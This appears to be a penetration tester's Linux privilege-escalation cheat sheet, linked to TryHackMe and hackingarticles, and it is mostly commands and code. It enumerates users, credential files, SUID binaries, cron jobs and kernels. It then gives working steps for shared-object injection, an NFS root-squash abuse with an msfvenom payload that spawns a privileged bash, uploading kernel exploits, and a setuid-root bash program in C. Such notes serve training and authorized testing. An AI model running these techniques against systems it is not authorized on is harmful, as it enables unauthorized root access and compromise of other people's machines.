Linux Privilege Escalation

OS & User Enumeration :

############################### User Enumeration ################################
whoami
id
sudo -l
cat /etc/passwd
ls -la /etc/shadow
################################# OS Enumeration #################################
cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
arch
ldd --verion
################################# Installed tools ################################
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
############################ File owners and permissions #########################
ls -la
find . -ls
history
cat ~/.bash_history
find / -type f -user <username> -readable 2> /dev/null # Readable files for user
find / -writable -type d 2>/dev/null # Writable files by the user
find /usr/local/ -type d -writable
################################## File mount ####################################
/mnt /media -> usb devices and other mounted disks
mount -> show all the mounted drives
df -h -> list all partitions
cat /etc/fstab # list all drives mounted at boot time
/bin/lsblk
#################################### Applications ################################
dpkg -l # for Debian based systems
##################################### Cron tabs ##################################
ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron* # Locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log # for locating running jobs from logs
grep CRON /var/log/syslog # grepping cron from syslog
#################################### Internal Ports ##############################
Netstat -alnp | grep LIST | grep port_num
Netstat -antp
netstat -tulnp
curl the listening ports
################################### Interesting DIRS #############################
/
/dev
/scripts
/opt
/mnt
/var/www/html
/var
/etc
/media
/backup
################################### SUID Binaries ################################
(https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/)
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
################################# Firewall Enumeration ###########################
grep -Hs iptables /etc/*
############################### Kernal Modules ##################################
lsmod
/sbin/modinfo <mod name>

PrivEsc Checklist :

SUID Shared Object Injection :

  • Find a SUID binary that looks fishy

  • strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"

  • Match the shared object that sits in a path where you have write access

  • create a shared object in the missing SO file name

  • run the SUID binary

NFS Misconfiguration :

https://tryhackme.com/room/linuxprivesc (Task 19)

  • cat /etc/exports

  • On Kali

    • mkdir /tmp/nfs

    • mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs

    • msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

    • chmod +xs /tmp/nfs/shell.elf

  • On Target

    • /tmp/shell.elf

Kernel Exploits

  • cat /proc/version

  • uname -r

  • uname -mrs

  • cat /etc/lsb-release

  • cat /etc/os-release

  • gcc exploit.c -o exp

  • Compile exploit in local machine and upload to remote machine

    • gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

    • apt-get install gcc-multilib

Recover Deleted Files :

C Program to SetUID /bin/bash :

gcc -Wall suid.c -o exploit

sudo chown root exploit

sudo chmod u+s exploit

$ ls -l exploit -rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit

#include <unistd.h>
int main()
{
setuid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}

./exploit # whoami root

Tools :

Resources :